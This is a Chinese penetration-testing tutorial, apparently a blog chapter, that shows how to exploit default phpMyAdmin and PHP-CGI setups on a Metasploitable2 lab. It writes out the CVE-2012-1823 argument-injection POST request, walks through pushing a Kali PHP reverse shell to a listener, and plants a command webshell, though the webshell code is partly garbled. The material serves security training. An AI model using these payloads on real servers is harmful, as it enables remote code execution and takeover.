二十一、手动漏洞挖掘:(1)默认安装配置漏洞

1、phpMyAdmin/setup

在metasploit2中,可以测试其漏洞,由于其mysql是由phpMyAdmin来管理,因此直接访问,可以看到

二十一、手动漏洞挖掘:(1)默认安装配置漏洞_第1张图片
setup访问控制

1.1、php根据版本直接执行调用系统命令

通过使用-d指定auto_prepend_file来制造任意文件包含漏洞,执行任意代码:

POST /phpMyAdmin/?-d+allow_url_include%3dOn+-d
+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.1.102       //要访问的服务IP地址

二十一、手动漏洞挖掘:(1)默认安装配置漏洞_第2张图片
漏洞远程执行效果

如果是一段执行木马,可以直接再后台运行,举例:将“abcdefghigk”写入到新建的a.php文件中,并查看

二十一、手动漏洞挖掘:(1)默认安装配置漏洞_第3张图片
写入文本
结果验证

1.2、PHP反弹shell

在kali自带一些php的木马,可以拿来直接使用/usr/share/webshells/php/php-reverse-shell.php。复制此文件到桌面为2.php,然后编辑此文件,修改其中的参数,其中IP为kali即反弹到的IP地址
修改IP地址和端口

修改IP地址和端口

将整个2.php文本复制到request请求中,而不是往目标服务器写入一个文件
二十一、手动漏洞挖掘:(1)默认安装配置漏洞_第4张图片
复制反弹程序

在kali上开启监听端口

监听1234端口

在repeater上执行go

二十一、手动漏洞挖掘:(1)默认安装配置漏洞_第5张图片
Paste_Image.png

查看结果

二十一、手动漏洞挖掘:(1)默认安装配置漏洞_第6张图片
目标主机shell反弹到kali

而作为ifconfig等命令并不能够执行,因为是用户是www-data,ifconfig不一定能够执行,该如何处理?

通过whereis找到ifconfig
二十一、手动漏洞挖掘:(1)默认安装配置漏洞_第7张图片
进入/sbin执行./ifconfig

1.3、webshell(静态shell)

在上述的php程序中换成如下内容,此内容可以理解成木马文件,写入到1.php,然后在http访问此文件即能够执行命令。

" > /var/www/1.php')
die();
?>
二十一、手动漏洞挖掘:(1)默认安装配置漏洞_第8张图片
写入木马文件
二十一、手动漏洞挖掘:(1)默认安装配置漏洞_第9张图片
查看是否存在1.php

访问http://192.168.1.102并将cmd=id(或其他命令)查看结果,可直接执行。


二十一、手动漏洞挖掘:(1)默认安装配置漏洞_第10张图片
验证结果

[PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析参考链接]https://www.leavesongs.com/PENETRATION/php-cgi-cve-2012-1823.html

2、PHP5-CGI

采用默认安装PHP5-CGI时,/cgi-bin/php5 和 /cgi-bin/php由于不在/var/www(网站目录)下,因此爬网是爬不出来的,但是是能够直接访问的,通过构造php程序可以执行执行。

你可能感兴趣的:(二十一、手动漏洞挖掘:(1)默认安装配置漏洞)